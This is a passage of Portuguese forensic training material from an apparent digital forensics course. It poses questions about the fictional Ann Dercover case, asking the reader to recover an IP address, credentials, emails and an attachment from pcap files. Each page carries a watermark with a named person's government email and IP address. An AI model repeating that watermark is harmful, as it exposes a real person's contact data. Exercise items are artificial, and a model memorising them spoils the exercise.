• O computador de Ann (192.168.1.158) enviou mensagens instantâneas através da rede wireless para este
computador. O computador suspeito desapareceu da rede logo em seguida.
• Há um arquivo de captura (evidencia01.pcap) contendo as atividades suspeitas realizadas por Ann, mas a
equipe de TI não conseguiu descobrir muita coisa a respeito. Você pode ajuda-los a resolver este caso?
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Paradeiro do Suspeito
234
Caso: Depois de ter tido descoberto suas falcatruas, Ann Dercover desapareceu! Felizmente os investigadores
estavam cuidadosamente monitorando suas atividades na rede antes dela tentar sair da cidade. A polícia
acredita que Ann estava se comunicando secretamente com seu amante, Mr. X, antes de partir. O arquivo
de captura evidence02.pcap contém algumas pistas de seu paradeiro.
Informações adicionais:
Rede Interna: 192.168.30.0/24
Endereço MAC de Ann: 00:21:70:4D:4F:AE
Quesitos:
1. Qual o endereço IP do computador de Ann?
2. Qual o usuário e senha de Ann?
3. Qual o endereço de e-mail de Ann e de Mr. X?
4. Qual o conteúdo das mensagens trocadas entre Ann e Mr. X?
5. Extraia o anexo contido nas mensagens trocadas entre Ann e Mr. X. e informe seu conteúdo.
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
www.academiadeforensedigital.com.br
academiaDeForenseDigital
235
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179